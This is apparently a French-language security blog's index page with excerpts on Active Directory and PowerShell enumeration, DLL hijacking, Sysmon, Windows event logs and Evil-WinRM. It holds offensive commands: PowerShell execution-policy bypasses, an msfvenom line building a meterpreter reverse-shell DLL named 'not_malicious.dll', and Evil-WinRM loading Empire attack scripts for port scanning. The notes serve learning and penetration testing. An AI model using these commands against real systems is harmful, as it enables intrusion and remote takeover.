Obtenir un maximum d’informations sur un domaine (sans powerview)

Introduction à Active Directory et Kerberos Un AD contient plusieurs domaines et organisation unit(OU) Introduction à PowerShell Get-Help * Liste tout l’aide disponibile Get-Help process Liste tout avec le mot-clé “process” Update-Help Update-Help Get-Help Get-Item -Full Get-Help Get-Item -Examples Get-Command -CommandType cmdlet Outrepasser les politiques d’exécution PowerShell powershell -ExecutionPolicy bypass powershell -c powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass” … Continuer la lecture

DLL Hijacking

Étapes pour réussir l’injection de DLL sous windows Identifier l’application vulnérable et son emplacement Identifer le ID du processus Identifier les DLL vulnérables qui peuvent être hijackés Remplacer la DLL d’origine Génération d’une DLL pour création d’une session meterpreter sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vulnérable … Continuer la lecture

Sysmon

L’utilitaire sysmon qui fait partie de sysinternals est un driver qui permet de monitorer un système. Cela permet d’avoir une vue détaillée des événements critiques qui se produisent lors d’intrusions dans une machine : création de processus, connexions réseau et changement à la date de création de certains fichiers. L’analyse de ces évements avec le … Continuer la lecture

Logs de Windows

Les logs de Windows peuvent être accédés de diverses façons Event Viewer (GUI-based application : eventvwr.msc). Observateur d’événements Wevtutil.exe (command-line tool) Get-WinEvent (PowerShell cmdlet) Liste les journaux des événements wevtutil el Lit les événements à partir d’un journal wevtutil qe Application /c:3 /rd:true /f:text   PowerShell cmdlet Get-WinEvent -FilterHashTable @{ LogName=’Application’ ProviderName=’MsiInstaller’ ID=11707 } Get-WinEvent -FilterHashtable … Continuer la lecture

Evil-WinRM

Il est possible de télécharger ou téléverser des fichiers à partir de Evil-WinRM avec les commandes upload et download Il est possible de rendre accessible des scripts powershell qui se situent sur la machine de l’attaquant evil-winrm -u USERNAME -p PASSWORD -i IP -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/ Invoke-Portscan.ps1 Get-Help Invoke-Portscan Invoke-Portscan -Hosts 10.9.0.70 -TopPorts 50 Il existe … Continuer la lecture